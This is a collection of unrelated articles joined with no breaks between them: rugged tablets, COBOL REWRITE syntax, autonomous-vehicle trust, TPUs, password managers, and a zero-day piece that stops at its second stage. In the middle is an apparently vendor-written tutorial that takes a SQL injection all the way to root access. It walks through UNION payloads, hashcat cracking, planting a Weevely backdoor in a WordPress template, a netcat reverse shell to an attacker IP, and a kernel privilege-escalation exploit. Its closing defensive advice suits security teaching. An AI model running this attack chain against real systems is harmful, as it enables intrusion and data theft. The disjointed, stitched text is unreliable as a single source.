After testing hundreds of units with various configurations from a variety of vendors and gathering feedback from maintenance personnel, Kelley's team settled on a few configurations from manufacturers including Panasonic and Getac that met most of its users' needs. Today, aircraft maintenance personnel use rugged or semi-rugged tablets or notebooks. For example, personnel who work under High-Velocity Maintenance, the Air Force's aircraft maintenance program that includes a host of computing-intensive tasks, use notebooks. Those who deal with extracting information from wiring diagrams also use rugged notebooks. For less computing-intensive work, tablets are an economical alternative. Aircraft maintenance workers who handle inventory or expedite orders typically use tablets.

Kelley says his group is striving to keep up with technological advances and is considering adopting rugged handhelds for some tasks. He is also looking forward to the introduction of a rugged Windows 8 tablet, as Windows devices are preauthorized for downloading information.

Doing the Math

With budget-strapped agencies being asked to justify purchases – rugged mobile devices generally cost more than equivalent consumer devices – carefully considering the total cost of ownership is critical.

"To truly calculate the TCO, you have to consider the initial price, reduced support and repair costs, reduced downtime, and the capability of the platform to perform the mission," Clinton says. "Our truly rugged devices have paid for themselves in short order, compared with nonrugged devices, with better customer satisfaction and efficiency and longer lifecycles."
The REWRITE statement logically replaces a record in a file.

    REWRITE record
        [ FROM source-field ]
        [ INVALID KEY statement-1 ]
        [ NOT INVALID KEY statement-2 ]
    [ END-REWRITE ]

- record must be the name of a logical record in the Data Division File Section. The associated file may not be a sort file.
- source-field is a data item or literal.
- statement-1 and statement-2 are imperative statements.
- The INVALID KEY and NOT INVALID KEY phrases may not be specified for sequential files or for relative files with sequential access.
- record and source-field may not share any storage area.
- The file associated with record must be a mass storage file and must be open in the I-O mode.
- For files with sequential access mode, the preceding I/O statement executed for the file must have been a successful READ statement. The REWRITE statement replaces the last record read with the contents of record. If the file is an indexed file, the primary key must not have been changed since the last READ.
- For random or dynamic access mode files, the REWRITE statement replaces the record specified by the file's key. For relative files, this is the record specified by the RELATIVE KEY data item. For indexed files, the record identified by the primary key is replaced.
- For an indexed file with alternate keys, the order in which duplicated keys are subsequently returned is affected as follows:
  - If the value of an alternate key has not changed, its order of retrieval is unchanged.
  - If the value is changed, and the new value is a duplicated value, the record's logical position is unpredictable within the set of records with that value.
- The REWRITE statement does not affect the current file position.
- The following occurrences cause the invalid-key condition:
  - The access mode is sequential and an indexed file's primary key is not identical to the value returned from the preceding READ.
  - The record being replaced does not exist in the file.
  - The value of an alternate key that does not allow duplicates equals that of another record already in the file.
  An invalid-key condition causes the REWRITE to fail and the file is not updated.
- If the invalid-key condition occurs, and there is an INVALID KEY phrase, statement-1 executes. If there is no INVALID KEY phrase, but there is an appropriate USE AFTER EXCEPTION procedure, that procedure executes. Otherwise, an invalid-key condition causes a message to be printed and the program halts.
- If the NOT INVALID KEY phrase is specified, statement-2 executes if the REWRITE statement is successful.
- For a sequential file, the size of the record must be the same as the one it is replacing. The size of the record written is determined by the size of record.
- The REWRITE statement updates the value of the FILE STATUS data item for the file.
- If the FROM phrase is specified, it is identical to first moving the value of source-field to record using the rules of the MOVE statement and then performing the REWRITE as if there were no FROM phrase.
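As a usage sketch, consider an indexed file opened in I-O mode with random access; the file, record, and data names here (CUSTOMER-FILE, CUST-KEY, and so on) are hypothetical, not part of the statement's syntax:

    MOVE "10042" TO CUST-KEY
    READ CUSTOMER-FILE
        INVALID KEY DISPLAY "NO SUCH CUSTOMER"
    END-READ
    ADD PAYMENT-AMT TO CUST-BALANCE
    REWRITE CUSTOMER-RECORD
        INVALID KEY
            DISPLAY "REWRITE FAILED, FILE STATUS " CUST-STATUS
        NOT INVALID KEY
            DISPLAY "CUSTOMER RECORD UPDATED"
    END-REWRITE

Because access is random, the record to replace is identified by the primary key rather than by the preceding READ, although reading first is the usual way to fetch the current contents before modifying them.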
Humans have an issue with trust. While innate to our nature, trust is also something that must be earned over time, and once lost it can take a long time to get it back, if at all. This is particularly true where new technologies like autonomous vehicle safety are concerned. We see time and again that regardless of the extensive number of hours of autonomous vehicle testing done safely, a single incident can overwhelm a news cycle. Think of last year's Uber crash or the more recent Tesla crashes. They do not become associated with a single company; rather, they become a trust challenge for a whole industry.

New Technologies Bring New Challenges to Safety and Security

In the findings from an investigation into one crash, a Tesla was found to have repeatedly made maneuvers at one particular area of a highway that eventually resulted in the vehicle crashing into a concrete barrier. On several occasions, the driver was able to maintain control and override the maneuvers to safely keep the vehicle in lane, but during the final incident, the driver was distracted and was not able to avoid the crash. Of further concern is that the car first increased speed from 62 mph to 71 mph just prior to steering into the barrier.

In an investigation by the National Transportation Safety Board (NTSB) of an unrelated accident, the NTSB found that the fatal collision of a car with autonomous driving features and a slow-moving truck was also partly the result of the driver not regaining control of the vehicle in time. It referenced an earlier accident where systems that "underpin AEB systems have only been trained to recognize the rear of other vehicles… in part because radar-based systems have trouble distinguishing objects in the road from objects that are merely near the road."

This represents a challenge with autonomous vehicle technology in its current state. Drivers tend to lose focus on the road, giving too much responsibility to low-level automation features and allowing the technology to work in a domain beyond its capabilities. The end results are both tragic and fear-inducing. Distracted driving is just as life-threatening in a vehicle with automated features as it is in a conventional vehicle.

The misunderstanding lies on two fronts. First, some companies are overly bullish in their confidence in the self-driving features of the car, leaving their consumers at risk. This is miseducation, and it is dangerous in itself. The second inappropriate interaction comes from a misunderstanding of what autonomous features are designed to do in today's vehicles. Lower-level autonomy is there to augment a human driver, not replace them. It helps the driver with things we as humans are really bad at, like paying attention for long periods of time or checking all our blind spots. However, at this point, there are a lot of things that humans do better than cars, like contextual understanding and object identification. In any case, the technology gets blamed much more than the humans do, and it results in a lack of trust that hurts the entire industry.

Mistrust, with a Side of Mistrust

Another modern phenomenon that impacts the trust of a consumer is a security incident, and if a misbehaving autonomous feature were the result of a cyberattack, the court of popular opinion could put an end to autonomous vehicles.
Even with drivers maintaining control, there is a risk that these highly connected vehicles could be infected with malware when connecting to a mobile device, downloading traffic reports, or receiving updates from the manufacturer for a potential maintenance issue, which could have devastating consequences. The mind can go to several nightmare scenarios: attackers crashing cars into each other, threat actors stopping cars on the highway and blocking major arteries, and the like. But more likely, attackers could use malware to steal payment credentials stored in the car's systems for use in automatic payments at gas stations, drive-through restaurants, car washes, or similar businesses where the driver may not need to exit the vehicle to make a purchase. And an almost inevitable scenario is that marketing data collection companies could monitor communications to know where you drive and when, how long you stayed, and what communications you saw or listened to.

Adapting Current Security Solutions to New Technologies

This brings the world of connected autonomous vehicles right up there with every network that requires the protections offered by security technologies such as firewalls, antivirus (EPP), endpoint detection and response (EDR), and distributed ledger technology (DLT). The massive mobile endpoint that is the modern vehicle comes with more than its share of security concerns and begs the question: are today's security solutions going to translate well to an autonomous vehicle? On the one hand, that car should appear to those security systems as one big network, albeit one that weighs more than a ton and can move faster than 100 mph. As a practical matter, though, the nature of the systems that make up that vehicle is going to be radically different. As such, manufacturers must work closely with firms on advanced security systems that are designed to work specifically with autonomous vehicles.

While the challenges inherent in assuring autonomous vehicle safety and security are significant, the good news is that a host of leading thinkers across the multiple industries involved in developing the required technologies have been hard at work solving these issues for quite some time. BlackBerry recently published the Road to Mobility: The 2020 Guide to Trends and Technology for Smart Cities and Transportation, which examines key points to consider as we enter the world of autonomous vehicles, including:

- Roadblocks and Pathways to Vehicle Electrification Adoption by Austin Brown, Executive Director, Policy Institute for Energy, the Economy, and the Environment at UC Davis.
- Challenges to Smart Mobility and Smart Cities by Roger Lanctot, Associate Director in the Global Automotive Practice at Strategy Analytics.
- Regulatory Policy, Safety and Security in Connected and Autonomous Vehicles by Parham Eftekhari, Executive Director of the Institute for Critical Infrastructure Technology (ICIT), the nation's leading cybersecurity think tank.

The publication includes numerous other articles from thought leaders with the Auto-ISAC, ITSA, Carnegie Mellon, Cyber Future Foundation, and more.

Safety, Security, and Trust

The future of transportation and mobility is one of the most exciting fields of technology, one that is both growing rapidly and producing advancements at dizzying speed.
If the industry is going to foster and maintain the trust required for the adoption of these technologies, safety and security must be top of mind from the beginning and throughout development and production. Safety, security, and trust are fundamental to this effort and inseparable in their importance.
In this series, we will be showing step-by-step examples of common attacks. We will start off with a basic SQL Injection attack directed at a web application and leading to privilege escalation to OS root.

SQL Injection is one of the most dangerous vulnerabilities a web application can be prone to. If a user's input is passed unvalidated and unsanitized as part of an SQL query, the user can manipulate the query itself and force it to return different data than it was supposed to return. In this article, we see how and why SQLi attacks have such a big impact on application security.

Example of Vulnerable Code

Before having a practical look at this injection technique, let's first quickly see what SQL Injection is. Suppose we have a web application that takes a parameter named article via a $_GET request and queries the SQL database to get article content. The underlying PHP source code is the following:

// The article parameter is assigned to the $articleid variable without any sanitization or validation
$articleid = $_GET['article'];
// The $articleid variable is passed as part of the query
$query = "SELECT * FROM articles WHERE articleid = $articleid";

A typical request to this web application passes the article ID in the URL's query string. If a user sets the value of the article parameter to 1 AND 1=1, the query becomes:

$query = "SELECT * FROM articles WHERE articleid = 1 AND 1=1";

In this case, the content of the page does not change because the two conditions in the SQL statement are both true: there is an article with an id of 1, and 1 equals 1. If a user changes the parameter to 1 AND 1=2, the query returns nothing because 1 is not equal to 2. That means the user controls the query and can inject SQL code to manipulate the results.
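To make this concrete, here is a minimal, self-contained sketch of an endpoint following the vulnerable pattern above. It is an illustration, not the demo application's actual code: the connection details and the title column are placeholders.

<?php
// Hypothetical reconstruction of the vulnerable endpoint. Only the
// query-building pattern matters here.
$pdo = new PDO('mysql:host=localhost;dbname=app', 'user', 'pass');

// UNSAFE: user input is concatenated directly into the SQL statement.
$articleid = $_GET['article'];                      // e.g. "1 AND 1=2"
$query = "SELECT * FROM articles WHERE articleid = $articleid";

foreach ($pdo->query($query) as $row) {             // the injected condition
    echo htmlspecialchars($row['title']), "\n";     // now controls the result set
}

Requesting ?article=1 AND 1=1 versus ?article=1 AND 1=2 against such an endpoint reproduces the boolean test just described.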
Let's see step by step how dangerous the exploitation of an SQL Injection can be. For reference, the following scenario is executed on a Linux machine running Ubuntu 16.04.1 LTS, PHP 7.0, MySQL 5.7, and WordPress 4.9.

For the purposes of this demonstration, we performed a security audit on a sample web application. During our penetration test, we identified a plugin endpoint that accepts the user ID via a $_GET request and displays the corresponding user name. The endpoint is directly accessible, which could indicate weak security.

The first thing someone would do is manipulate the entry point (the user-supplied $_GET parameter) and observe the response. What we are looking for is whether our input causes the output of the application to change in any way. Ideally, we want to see an SQL error, which would indicate that our input is parsed as part of a query. There are many ways to identify whether an application is vulnerable to SQL injection. One of the most common and simplest is the use of a single quote, which under certain circumstances breaks the database query. The MySQL error that we get confirms that the application is indeed vulnerable.

At this point, it is almost certain that soon we will be able to exfiltrate data from the backend database of the web application. If our input is being parsed as part of the query, we can control it using SQL commands. If we can control the query, we can control the results. We have identified the SQL injection vulnerability, now let's proceed with the attack. We want to get access to the administration area of the website. Let's assume that we don't know the structure of the database or that the administrator used non-default naming/prefixes when installing WordPress.

We need to find table names to be able to grab the administrator's password later. First, we need to find out how many columns the current table has. We will use column ordering to achieve that. ORDER BY is used to set the order of the results; you can order either by column name or by the number of the column, and in this case we need to use the number. If the number that we pass in the parameter does not exceed the total number of columns in the current table, the output of the application does not change because the SQL query is valid. However, if the number is larger than the total number of columns, we get an error because there is no such column. In our case, we identified 10 columns; with a higher number we don't get any results, and depending on the setup we might get an error instead.

Now that we know how many columns the current table has, we will use UNION to see which column is vulnerable. UNION SELECT is used to combine results from multiple SELECT statements into a single result. The vulnerable column is the one whose data is displayed on the page. In our case, the number "10" is displayed on the page, which means this is the vulnerable column. We can confirm this by replacing it with version(), which shows the MySQL version.

Next, we need to find the table names, which we will then use to exfiltrate data. The GROUP_CONCAT() function concatenates results into a string, the information_schema is a database that stores information about other databases, and the database() function returns the name of the current database. (These payloads are consolidated in the sketch at the end of this passage.)

Now that we have the table structure, we can query the database to get the admin's credentials from the wp_users table. The query returns the admin's password hash. To find the password for this hash, we will use a well-known password recovery tool named hashcat. This software offers various methods of cracking a password. We will try a dictionary attack with a relatively small list containing 96 million passwords. After downloading hashcat as well as the password list, we run the following command:

hashcat64 -m 400 -a 0 hash.txt wordlist.txt

-m = the type of the hash we want to crack; 400 is the hash type for WordPress (the MD5-based phpass scheme)
-a = the attack mode; 0 is the Dictionary (or Straight) Attack
hash.txt = a file containing the hash we want to crack
wordlist.txt = a file containing a list of passwords in plaintext

We were lucky and able to recover the password within a few minutes. The recovered password is 10987654321.

Unless two-factor authentication is in place, the admin's password should be sufficient to access the website's backend. Once we do that, the options are limitless. It is important to note that at this stage we have full admin access to the website's backend, which means we can impersonate any user login, access any page/post including those with sensitive data, export all the data including users, insert into tables, drop tables, and pretty much do anything we want.

Let's see how far we can get. There are third-party WordPress plugins that could allow us to execute shell commands or upload new files. However, we will avoid those.
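The individual payloads described above can be summarized as follows. This is an illustrative sketch, not a transcript of the test: it assumes the injectable parameter is named article, that the table has 10 columns with the tenth echoed to the page, and that WordPress uses its default wp_ table prefix.

-- 1. Determine the column count (the page breaks one past the real count):
--    ?article=1 ORDER BY 10        -- page unchanged: at least 10 columns
--    ?article=1 ORDER BY 11        -- empty page or SQL error: exactly 10
--
-- 2. Find which column is echoed back, then confirm with version():
--    ?article=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10
--    ?article=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,version()
--
-- 3. List the tables of the current database:
--    ?article=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,GROUP_CONCAT(table_name)
--        FROM information_schema.tables WHERE table_schema=database()
--
-- 4. Pull the credentials (0x3a is a ':' separator):
--    ?article=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,GROUP_CONCAT(user_login,0x3a,user_pass)
--        FROM wp_users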
Instead, to further escalate this attack we will use Weevely, a popular lightweight PHP backdoor. After downloading and unpacking the software, we will first create an agent to be injected into the WordPress site, which will give us the ability to execute system commands under the low-privileged web server account (www-data). The following command creates a file that must be uploaded to the target system:

secuser@secureserver:~/weevely3-master# ./weevely.py generate abcd123 agent.php
--> Generated backdoor with password 'abcd123' in 'agent.php' of 1332 byte size.

Instead of uploading the file, we will use existing WordPress template files to inject the contents of agent.php. We navigate to the appearance editor (which is enabled by default) and inject the code of agent.php into the header.php template. Now the backdoor agent is in place. We need to initiate a connection to it from our local computer. Because we injected the agent into the theme header, we can specify any WordPress page as a target, since the header is included in all template files.

Usage: ./weevely.py [URL] [AGENT_PASSWORD]

root@secureserver:~/weevely3-master# ./weevely.py http://acunetix.php.example/wordpress/ abcd123

As we can see below, we have successfully initiated a connection to our backdoor agent. Running the id command returns the current user, which is www-data. We also see that the hostname is windoze and the current working directory is /var/www/html/wordpress. On the victim's end, the requests sent to the backdoor show up in the web server log.

On our local machine we also start a Netcat listener so that we can create a reverse shell connection from the target to our computer:

root@secureserver:~/weevely3-master# nc -l -v -p 8181
listening on [any] 8181 ...

We now send the following command to our backdoor agent to initiate a reverse shell connection:

www-data@targetmachine:/var/www/html/wordpress $ backdoor_reversetcp 192.168.2.112 8181

The Netcat listener shows that a connection has been established. We now have a low-privileged shell on the target machine. What we want is to escalate our privileges and get root access. The uname -a command returns enough information for us to proceed with the attack; we are interested in the kernel version. We found a privilege escalation exploit that works on this kernel version. We download and compile it on our local machine, then use the reverse shell connection to download the exploit to the target machine. We grant the execute permission on the exploit by running chmod +x chocobo_root and then we run it. After a few moments, the privilege escalation is successful, and we can see that we are running as root.

At this point, we have full root access to the target machine, which means that the security triangle of confidentiality, integrity, and availability has been completely compromised. This can be disastrous for an organization because an attacker can:

- Read/edit/delete confidential/private files on the server, which may include:
  - Files containing passwords
  - SSL certificates
  - Databases with third-party data, which may contain sensitive information such as credit card numbers, addresses, names, and telephone numbers
  - Financial information such as invoices, payroll, and agreements
  - Private images or videos
- Use the machine to attack/access other computers/servers internally (pivoting)
- Use the machine to deliver malware to users
- Create new users, monitor traffic, etc.

It is important to note that the machine was running on a default setup without any changes, which made the attack easier.
The following factors were critical to the successful exploitation of this vulnerability:

- The web application was vulnerable to SQL Injection, one of the most dangerous vulnerabilities for an application. A vulnerability scanning tool would have detected it and given information on how to fix it.
- There was no WAF (Web Application Firewall) in place to detect the SQL Injection exploitation. A WAF could block the attack even if the application is vulnerable.
- There was no Intrusion Detection or Intrusion Prevention system in place. Many such systems keep a database with hashes of all the monitored files; if a file is modified, its hash changes and the system notifies the administrator about potentially malicious activity. This means that the changes made to header.php (where the Weevely backdoor was injected) could have been detected.
- The OS was not up to date, which allowed the privilege escalation to be successfully exploited.

Getting a free online SQL Injection test with Acunetix allows you to easily identify critical vulnerabilities in your code which can put your web application and/or server at risk.

Frequently asked questions

An SQL Injection may lead to loss of confidential data including client data, which may affect compliance and lead to huge fines. An SQL Injection may also lead to complete system compromise (as described in this article).

If you suspect that you were a victim of an SQL Injection, first check your applications using a web vulnerability scanner like Acunetix to confirm that there is a vulnerability. If you confirm that there is a vulnerability and you suspect that an attacker used it, you need to perform a manual analysis of your system.

To prevent SQL Injections, the application must never directly include user input in queries. Instead, all developers must use parameterized queries (prepared statements) and/or stored procedures; a sketch of this fix follows at the end of this article.

The Acunetix site has tons of information about all flavors of SQL Injection. This is because Acunetix has always focused strongly on helping you prevent this critical vulnerability. Simply search our site to find more.
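As an illustration of the parameterized-query advice above, here is a minimal sketch of the vulnerable endpoint rewritten with PHP's PDO prepared statements. The connection details and column name are placeholders, not the demo application's actual values.

<?php
// The user input is bound as a typed parameter, so it can never alter
// the structure of the SQL statement itself.
$pdo = new PDO('mysql:host=localhost;dbname=app', 'user', 'pass');

$stmt = $pdo->prepare('SELECT * FROM articles WHERE articleid = :id');
$stmt->execute([':id' => (int) $_GET['article']]);  // bound, and cast to int

foreach ($stmt->fetchAll() as $row) {
    echo htmlspecialchars($row['title']), "\n";     // output encoding as well
}

With this version, a payload such as 1 AND 1=2 is reduced to the integer 1 rather than being executed as SQL, and the boolean test from the beginning of the article no longer works.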
Imagine that a race car driver showed up to the Indianapolis 500 with a pickup truck. No matter how big the engine in that pickup, the design limitations of the vehicle would quickly become apparent: it is simply not light enough, agile enough, or aerodynamic enough to compete.

We see a similar problem with processors. General-purpose processors have made amazing strides over the past few decades, exponentially increasing their capabilities. However, the prevalence of machine learning and AI keeps pushing the need for lower latency, while processors like CPUs and GPUs are hitting their ceilings. This problem led Google to unveil the first Tensor Processing Unit (TPU) in 2016, with two new iterations since. What is a TPU, and why should machine learning experts care?

The TPU Is the Race Car of Computer Processing

A TPU is a specialized processor that limits its general processing ability to provide more power for specific use cases, namely running machine learning algorithms. Traditional processors are constantly storing values in registers, and a program tells the Arithmetic Logic Units (ALUs) which registers to read, the operation to perform, and where to put the result. This process is necessary for general-purpose processors but creates bottlenecks that slow down machine learning workloads. Like a race car designer who strips out any excess weight that would slow the car down, the TPU eliminates the need for the constant read-operate-write cycle, speeding up performance.

How does a TPU do this? It uses a systolic array to perform large, hardwired matrix calculations that allow the processor to reuse the result of reading a single register and chain together many operations. The system batches these calculations in large quantities, bypassing the need for memory access and speeding up the specialized processing (a small illustrative sketch of this kind of batched matrix workload appears at the end of this article). These properties are part of what makes a TPU 15-30 times faster than top-of-the-line GPUs and 30-80 times more energy-efficient.

However, these powerhouses aren't suitable for every use case. Just as race cars aren't practical for most other environments, the TPU shines only in specialized conditions. The following conditions may make using a TPU impractical:

- Your workload includes custom TensorFlow operations written in C++
- Your workload requires high-precision arithmetic
- Your workload uses linear algebra programs that require frequent branching or are dominated by element-wise algebra

Does Your Infrastructure Need a Race Car or a Utility Vehicle?

The power and efficiency of TPUs are undeniable. When clustered together, a TPU 3.0 pod can generate up to 100 petaflops of computing power. But this power is limited to jobs unique to machine learning, so the question of whether or not to use a TPU in your organization comes down to the use case, which the following questions can help you analyze:

- What job are you procuring compute infrastructure for?
- Will your computing needs stay consistent, or do you need flexibility?
- What scripts and languages will your software be running?

Race cars are fun, but they're not practical for every task. If you have complex computing needs for AI and ML applications, we can help. Equus provides the robust compute and storage capabilities you need to power these advanced technologies. Our team can help you find the right balance of processing power, high-density storage, and networking tools to ensure powerful yet cost-effective solutions. Contact us to learn more.
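As promised above, here is a small illustrative sketch, using JAX (one of the frameworks that can target TPUs), of the batched matrix multiplication that a systolic array accelerates. The shapes are arbitrary, and the code runs on whatever backend is available, so treat it as a demonstration of the workload rather than a benchmark.

import jax
import jax.numpy as jnp

# A batched matrix multiply: the kind of hardwired operation a TPU's
# systolic array is built around. jax.jit compiles it for whatever
# backend is present (TPU if available, otherwise GPU or CPU).
@jax.jit
def batched_matmul(a, b):
    return jnp.einsum('bij,bjk->bik', a, b)

key = jax.random.PRNGKey(0)
k1, k2 = jax.random.split(key)
a = jax.random.normal(k1, (64, 128, 128))   # arbitrary illustrative shapes
b = jax.random.normal(k2, (64, 128, 128))
out = batched_matmul(a, b)
print(out.shape, jax.devices())             # shows which backend ran it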
In today's digital world, where multiple accounts and passwords are the norm, password managers are becoming indispensable tools for security and efficiency. A password manager is software that helps users create, store, and manage unique passwords for various online services. This tool is important not only for keeping personal data secure, but also for streamlining everyday work. With a password manager, you can forget about the need to remember many complex combinations, because it stores all your passwords in an encrypted vault that can be accessed with a single master password. Additionally, many password managers offer a feature to generate random, strong passwords, which is critical to protecting your accounts from being compromised. This reduces the risks associated with using the same password for multiple sites, which is a common problem in cybersecurity.

Password managers are also often equipped with additional security features, such as two-factor authentication, end-to-end encryption, and autofilling of forms, allowing users not only to protect their passwords but also to simplify the process of using them. These tools are important not only for individual users but also for businesses, where managing a large number of accounts and keeping them secure is a key aspect of protecting important corporate information. Using a password manager significantly reduces the risks associated with cybercrime, such as phishing, hacking attacks, and data leakage, ensuring your digital identity is securely protected. In this article, we'll take a detailed look at how to choose the best password manager for your needs and how to get the most out of its features.

The history of password managers is closely tied to the development of the Internet and the growing need to manage many passwords safely. The idea of a password manager arose as a response to a problem faced by many Internet users: the need to remember a large number of complex passwords for different accounts. The first password managers appeared in the 1990s, when the Internet was just beginning to gain popularity. These programs were simple applications that allowed you to store passwords and other sensitive information in encrypted form. Their main goal was to give users a secure place to store their passwords, helping them avoid using the same password for multiple sites.

As cyber threats evolved and the number of online accounts grew, password managers became more sophisticated and functional. They began to offer additional features such as generating random passwords, autofilling forms on websites, two-factor authentication, and syncing data between devices. Today, in the era of high technology and big data, password managers are a key tool in the fight against cybercrime, helping users keep their personal data securely protected. They have become very popular among users around the world as an effective way to manage personal security in the digital space.

A password manager is a tool designed to securely store and manage passwords for various online accounts. Acting as a digital safe, it stores your login credentials as well as other sensitive data such as credit card information and important files. With one master password, you can access your saved passwords and even create strong, unique passwords for different accounts.
This not only simplifies the login process, but also significantly improves your online security and reduces the risk of password cracking. In addition, password managers often support features such as cross-platform access, secure password sharing, and storage of two-factor authentication codes, making them a valuable tool for providing strong protection against cyber threats.

Password managers perform several tasks, including storing and protecting passwords.

Password storage – The password manager securely stores your login credentials for various accounts on the Internet, such as sites and applications, in encrypted storage. This eliminates the need to remember multiple passwords and ensures that they are protected from unauthorized access. Only you can decrypt the information in the password vault, using your master password.

Password protection – A dedicated password manager offers a secure approach to protecting confidential information. Dedicated password managers are designed to keep your data secure with multi-level encryption, using advanced techniques such as zero-knowledge encryption. This means that even the service provider cannot access the passwords stored in it, and ensures that only you can access your confidential information. Browser-based password managers, by contrast, often lack zero-knowledge encryption, which leaves them vulnerable to potential hacking. Browser-based password managers also often don't log you out, so if your device is lost, stolen, or infected with malware, all of your passwords can be compromised.

Password managers can create complex and strong passwords because they have a built-in password generator. Generated passwords are typically a combination of letters, numbers, and special characters, making them difficult for cybercriminals to guess or crack. Many password managers also scan existing passwords and detect weak passwords or ones duplicated across multiple accounts. This lets you find vulnerable passwords and replace them with stronger ones that are difficult for cybercriminals to compromise.

Many password managers, such as Keeper Password Manager, also support two-factor authentication, generating and storing time-based one-time passwords (a sketch of how such codes are derived follows at the end of this passage). This provides an extra level of security for your online account beyond your password, as an additional check is performed when you log in. Typically, two-factor authentication requires you to download an authenticator app, such as Google Authenticator; a password manager that stores the two-factor authentication code eliminates this need. The password manager generates the two-factor authentication code and automatically enters it when you sign in to your account.

Some password managers also allow you to securely store additional sensitive information such as files, images, and videos. This feature can be used to protect important documents, ID photos, or other personal data. In addition, the best password managers allow you to share this information securely with other users.
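For the curious, here is a minimal sketch of how a time-based one-time password (TOTP, per RFC 6238) is derived; this is the same calculation an authenticator app or a password manager performs. The secret shown is a standard demo value, not a real account key.

import base64, hmac, hashlib, struct, time

# Derive a six-digit TOTP code from a base32-encoded shared secret.
def totp(secret_b32: str, period: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32, casefold=True)
    counter = struct.pack('>Q', int(time.time()) // period)  # 8-byte counter
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                               # dynamic truncation
    code = struct.unpack('>I', digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp('JBSWY3DPEHPK3PXP'))  # illustrative demo secret

A new code is produced every 30 seconds, and the server performs the same calculation with its copy of the secret to verify it.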
Not using a password manager can expose you to a number of risks that compromise your personal and financial security online. Here are some of them:

Weak and Repeated Passwords: Without a password manager, people often use simple or repeated passwords because complex combinations are hard to remember. This greatly increases the risk of accounts being hacked.

High Risk of Phishing: Users without a password manager can more easily end up on fake sites and hand their information to fraudsters, since password managers usually refuse to autofill passwords on suspicious websites.

Forgotten Passwords: These lead to frequent password resets, which is not only inconvenient but also increases your security risk, especially if the recovery procedure is vulnerable or compromised.

Data Leakage: If one of your accounts is compromised and you use the same or similar passwords elsewhere, a chain effect can follow in which attackers gain access to several of your accounts.

Inability to Create Complex Passwords: Without a password manager, creating and remembering complex, unique passwords for each account becomes an almost impossible task.

Loss of Account Control: In the event of a password breach or loss, the lack of centralized password management can make it difficult to regain access and control over your accounts.

Threat to Mobile Security: In today's world, where a lot of online activity happens on mobile devices, the lack of a password manager can also lead to data leakage through mobile applications.

Overall, not using a password manager significantly lowers your cybersecurity level and puts you at risk of cyberattacks and the loss of sensitive information.

The lack of two-factor authentication (2FA) on a password manager can also lead to significant security risks, as 2FA is an important layer of protection in modern cybersecurity practice. Here is how its absence can be dangerous:

Increased Hacking Risk: Single-factor authentication, which uses only a password, makes things much easier for attackers. 2FA adds an extra layer of verification, often in the form of an SMS message, an authenticator application, or a physical key, making hacking much more difficult.

High Risk of Data Theft: If your password manager becomes the target of an attack, having only one layer of protection (the password) makes your stored data significantly more vulnerable to theft.

Losing Access to Important Accounts: If someone gains access to your password manager, they can change passwords and intercept access to all your accounts, including bank and email accounts.

Phishing Attacks: Without the added layer of protection that 2FA provides, password manager users are more vulnerable to phishing attacks that aim to steal their credentials.

Difficulty Detecting Unauthorized Access: 2FA often includes notification of login attempts, which helps detect suspicious activity. Without this, the user may not be aware of unauthorized access to their password manager.

Increased Risk of Data Loss: If hacked, attackers can not only gain access to your password manager, but also delete or modify the data stored there.

Taken together, the lack of 2FA on a password manager significantly reduces the overall level of security and increases the chances of unauthorized access and data loss.

Yes, using a password manager is worth it: you will never forget your passwords, they will always be strong, and you won't have to use a separate app for two-factor authentication codes. With a password manager, gone are the days of forgetting your password, using the same password for multiple accounts, or constantly resetting passwords. Your passwords are securely stored and you can easily access them at any time, which eliminates the need to remember complex passwords on your own. The password manager generates a strong and unique password for each account.
This ensures that your online accounts are always protected with strong passwords that follow best practices: upper and lower case letters, numbers, special characters, and a length of 16 or more characters (see the sketch at the end of this article). Many password managers also let you create and store two-factor authentication codes within the same program, which means you don't have to switch between multiple apps or devices to access your two-factor authentication code, simplifying the sign-in process and improving overall security.

Choosing the right password manager is very important for protecting your online credentials and managing them conveniently. You should choose a password manager that provides zero-knowledge encryption, device compatibility, automation, and support for multi-factor authentication.

Zero-knowledge encryption. Zero-knowledge encryption is a security approach that ensures data privacy by guaranteeing that only you can access and decrypt your data. A zero-knowledge password manager ensures that even the service provider cannot read the stored data, giving you complete control over it.

Device compatibility. You should choose a password manager that is compatible with the devices you use regularly, such as smartphones, tablets, laptops, and desktops. A cross-platform password management solution ensures access to passwords from anywhere and on any device.

Automation. A robust password manager has automation features such as autofill. Autofill simplifies the process of logging in to sites and applications, because you do not need to enter credentials manually, which improves convenience without compromising security.

Support for multi-factor authentication. Make sure the password manager you choose supports multi-factor authentication. Multi-factor authentication provides an additional level of security, as it requires additional verification beyond the master password. This feature significantly strengthens the password manager's protection against unauthorized access.

These are just a few of the many important features you should be aware of when choosing a password manager. In addition, it is worth researching the reputation of the password manager and reading customer reviews to make sure it is reliable.
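As a small illustration of the password-generation feature described above, here is a sketch in Python of a generator that enforces the stated best practices. It is a simplified stand-in for what a manager's built-in generator does; real products add configurable rules and character exclusions on top.

import secrets, string

# Generate a random password of 16+ characters containing upper and
# lower case letters, digits, and special characters.
def generate_password(length: int = 16) -> str:
    alphabet = string.ascii_letters + string.digits + string.punctuation
    while True:
        pw = ''.join(secrets.choice(alphabet) for _ in range(length))
        # keep only candidates that contain every character class
        if (any(c.islower() for c in pw) and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw)
                and any(c in string.punctuation for c in pw)):
            return pw

print(generate_password())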
Zero-day exploits are akin to ticking time bombs. These threats lurk in the shadows, waiting to be discovered by malicious actors and unleashed on unsuspecting systems. Understanding the life cycle of a zero-day exploit, from its initial discovery to the deployment of defenses, is crucial for businesses and individuals alike to fortify their digital landscapes.

Stage 1: Discovery of the Vulnerability

The life cycle of a zero-day exploit begins with the discovery of a vulnerability. Unlike known vulnerabilities, which have been identified and cataloged, a zero-day vulnerability is unknown to software developers and vendors. This stage is particularly dangerous because there is no available patch or fix, leaving the affected systems exposed.

Example: The infamous Heartbleed bug, discovered in 2014, was a zero-day vulnerability in the OpenSSL cryptographic library. Before its public disclosure, this vulnerability had existed for over two years, allowing attackers to exploit it without detection.

Stage 2: Development of the Exploit

